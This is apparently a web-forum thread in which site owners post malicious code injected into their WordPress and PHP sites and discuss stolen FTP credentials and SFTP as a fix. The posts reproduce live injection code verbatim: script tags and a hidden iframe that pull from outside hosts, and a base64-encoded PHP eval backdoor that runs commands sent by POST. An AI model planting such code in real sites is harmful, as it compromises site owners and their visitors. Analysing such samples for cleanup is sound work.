I will kill you !!!!!!

ronijs

Registered Member
Joined
Oct 29, 2007
Messages
68
Reaction score
72
I know, you are somewhere here!

How the hell you can drop these codes in my godaddy hosting account, in almost all php and html files, in wp blogs and other scripts?? I scanned my PC for viruses. I changed host/ftp all passwords and logins, but you drop these codes again and again!
I have backdoors in firefox, filezilla or maybe windows??
Most of my sites are Fatal error again. Hours to reload new files again.

I dont know who you are, but hope you will die soon!!!! :AR15firin This is not blackhat U fucking hacker!!!!!


Code:
<script src=http://naturaldoctors.co.kr/bbs/image/vote.php ></script>

<iframe frameborder="0" onload="if (!this.src){ this.src='http://testoid.ru:8080/index.php'; this.height='0'; this.width='0';}" >fdhmyitvffphvroqnxhfcrjznpfnndx</iframe>

<script src=http://1interimmo.com/images/gifimg.php ></script>


<?php eval(base64_decode('aWYoIWlzc2V0KCR3eXgxKSl7ZnVuY3Rpb24gd3l4KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMjVoZEhWeVlXeGtiMk4wYjNKekxtTnZMbXR5TDJKaWN5OXBiV0ZuWlM5MmIzUmxMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gd3l4MigkYSwkYiwkYywkZCl7Z2xvYmFsICR3eXgxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR3eXgxKSljYWxsX3VzZXJfZnVuYygkd3l4MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd3eXgnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnd3l4Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHd5eGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3d5eDInKSkhPSd3eXgyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>


Hey guys, how to stop this shit to not happen again?
 
He's probably not on this forum and that's kind of a bit too aggressive of a title don't you think?

A lot of wp blogs are getting hacked lately
 
could be MySQL injection, or just a simple RFI exploit. Most pwnage http: sites are WP pages. Because they're the easiest to exploit and pwn. Happy hackin'! :D
 
I had some wp blogs get hacked not too long ago. It was a virus on my computer that got through an old version of Acrobat Reader and then I was using Filezilla which they got my passwords from. It was a pain in the ASS to figure out and fix. It infected all kinds of index files and a few others.

Now I only use SFTP (WinSCP) and never any desktop FTP programs.
 
even i found this code from my site
Code:
<script src=http://damisystem.com/gallery/index.php ></script><body id="page1"><iframe frameborder="0" onload="if (!this.src){ this.src='http://testoid.ru:8080/index.php'; this.height='0'; this.width='0';}" >gjqdzwshgwygwdbtmuweovswcxhenbd</iframe>

is this a harmful malware? can any one tell me how to remove this?
 
I use SFTP through winscp or shell to access machines. Nothing that stores credentials in plaintext.

http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/
 
The recent outbreak of the "onload if this" website infection is detailed here in my blog post.

http://www.wewatchyourwebsite.com/wordpress/?p=278

The reason your site get hacked over and over again is also explained. There is remote control code on your site that allows the hackers to send new iframes or other forms of infectious code to your site and have it automatically injected into various pages on your site. It starts with stolen FTP login credentials but after that, they no longer need to use FTP, they use their remote control code instead. No log entries then.

Post back here if you need further help.
 
If you have used Filezilla and want to switch over to winscp does Filezilla cache any of the passwords or files on the server or does it only leave it live during the session. Do I need to delete anything from the server I re secure my server?
 
Just an ot question: what's the difference between an ftp app such as filezilla and the one which is included as a feature in hosting companies? Thanks in advance! :)
Posted via Mobile Device
 
lol, stop using filezilla.

I second that!

I had a bunch of Wp sites hacked earlier this year and FileZilla was the only common thead between them.

I've been usng WinSCP since and not a problem.

Get it here:

Code:
http://winscp.net/eng/index.php

Cheers
 
Back
Top